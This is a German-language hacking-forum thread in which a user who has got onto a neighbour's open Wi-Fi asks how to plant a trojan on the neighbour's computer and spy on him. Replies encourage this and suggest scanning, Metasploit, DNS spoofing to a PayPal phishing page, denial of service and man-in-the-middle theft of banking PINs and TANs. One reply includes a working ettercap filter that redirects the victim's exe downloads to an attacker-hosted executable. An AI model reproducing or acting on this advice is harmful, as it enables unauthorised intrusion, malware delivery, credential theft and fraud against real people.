Hi,

hab eben herausgefunden, dass jemand in meiner Umgebung ein offenes Wlan hat. Bin rein, naja ins Inet kann ich usw. offene Ordner gibt es auch^^

Aber was kann ich jetzt am besten machen?
Cain läuft natürlich schon durch ;)

Kann ich dem irgendwie etwas unterjubeln? Die Frage ist nur wie?

Wie meinse das unterjubeln? (ein virus) oder (Eine Womögliche Strafanzeige )

Erstes:| Ka |
Zweitens:| Illegale sachen downloaden |

naja ich will eig. wissen was er so treibt.(ggf. Trojaner)
Cain reicht ;)

Ne ich will dem keinen ärger machen^^

Aber wie sicher bin ich dabei eigentlich?

las halt mal nmap durch laufen und guck ob jemand nicht geupdated hat.

ansonsten natürlich sniffen was du schon machst, man könnte auchnoch dns abfragen manipulieren um paypal auf ne phishing seite von dir umzuleiten oder sowas.

man könnte auchnoch dns abfragen manipulieren um paypal auf ne phishing seite von dir umzuleiten oder sowas.

Wie mache ich das?^^
Naja ich hab vlt. bald Zugriff auf den Router, das kann auch nicht schlecht sein...

nmap ist was?
edit: google hilft^^ http://de.wikipedia.org/wiki/Nmap

wenn du kontrolle über sein system willst, könntest du einmal nessus + metasploit versuchen, oder du manipulierst gleich den ganzen traffic mit ettercap und ersetzt sämtliche downloadanfragen von exe dateien mit deinem server (und hoffst, dass er keinen verdacht schöpft^^):


# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

Naja, wenn es ein größeres Netzwerk mit mehreren Rechnern ist, kannste jemanden mit einer Smurf-Attacke aus dem Netz DOSen.
Ein wenig BlackHat-iger wäre ein Man-in-the-Middle-Angriff, um beispielsweise SSL-gesicherte OnlineBanking Aktivitäten auszuhorchen.

~~ Das soll keine Anleitung sein, sondern nur eine Aufzeigung der Möglichkeiten. ~~

Grüße
atbash

Jetzt mal im Ernst: Warum so ein Aufwand um einen einzigen Computer (mit was auch immer) zu infizieren?

Das war ja nicht die Frage...
Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!
Einfach weil mans kann, oder weils Spaß macht.
DoS find ich macht auch nicht viel Sinn, und trotzdem ist es für viele Leute einfach eine Genugtuung.
Und beim MITM-Angriff stehen denke ich finanzielle Gründe im Vordergrund, oder vielleicht noch ein 'höheres' Ziel.
Grüße
atbash

Das war ja nicht die Frage...
Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!

Weil man den Dump von 'nem Pferdeforum genauso gut cracken kann wie den aus 'nem Gayforum? :D
Ist doch scheiß egal mit welchem Thema sich das Board befasst, hauptsache die Userzahlen stimmen. Von daher kein überzeugendes Argument...

Was du jetzt anstellen kannst:
1. Du kannst kostenlos im Internet deines Nachbarn surfen!!!11einseinsölf
2. Du kannst nach herzenslust Faken & Carden
3. Be creative!

Ich wollte damit nur sagen, dass mir sehr wohl einige Dinge einfallen würde, die man ausser kostenlos Surfen noch machen kann. Das war ja quasi auch die Frage.
Und ein MITM-Angriff würde, um Kreditkarteninformationen, oder Bankverbindungen rauszufinden schon lohnen. Ist halt aufwändig, aber ist doch scheiß egal, wenns uns nicht irgendwie jucken würde, wären wir alle nicht in dem board hier. :)
Grüße
atbash

[...]um Kreditkarteninformationen, oder Bankverbindungen rauszufinden schon lohnen.[...]
Mhm...
Deknst du wirklich, dass sich der Aufwand lohnt? Was bringen dir Bankverbindungen? Und 'ne CC hat 'nen Wert von ca. €5.
Muss jeder selber wissen:P

Also, nicht nur Bankverbindungen, sonder auch dazugehörige PIN und TAN.
so far
atbash

pin und tan bringt dir nich viel da du jedes mal nen neuen tan brauchst. da stehn doch auf so nem blatt 100 stück und jedes mal wenn du online bankng machst wird 1 nummer abgefragt. wenns falsch is oder schon benutzt wirde wird diese nummer gestrichen und kann nich nochmal verwendet werden
verbessert mich wenn ich falsch lieg

pin und tan bringt dir nich viel da du jedes mal nen neuen tan brauchst. da stehn doch auf so nem blatt 100 stück und jedes mal wenn du online bankng machst wird 1 nummer abgefragt. wenns falsch is oder schon benutzt wirde wird diese nummer gestrichen und kann nich nochmal verwendet werden
verbessert mich wenn ich falsch lieg
Nein, du liegst Goldrichtig :)

Also wie gesagt: Der Aufwand lohnt einfach nicht!

Als Man-In-The-Middle, empfängst du die Nachricht mit PIN und TAN als erstes, es liegt dann quasi an dir, ob du es an die Homepage unverändert weiterleitest...
Seid doch mal kreativ.
Grüße
atbash

Onlinebanking lohnt sich nich abzufangen - dann schon eher DNS-Abfragen maniulieren und nen Trojaner einschleusen zum Beispiel über nen Download den du änderst oder ne gefakte Seite... Lass deiner Fantasie freien lauf, alles ziemlich einfach...

ui ja toll ein trojaner <3 juhu..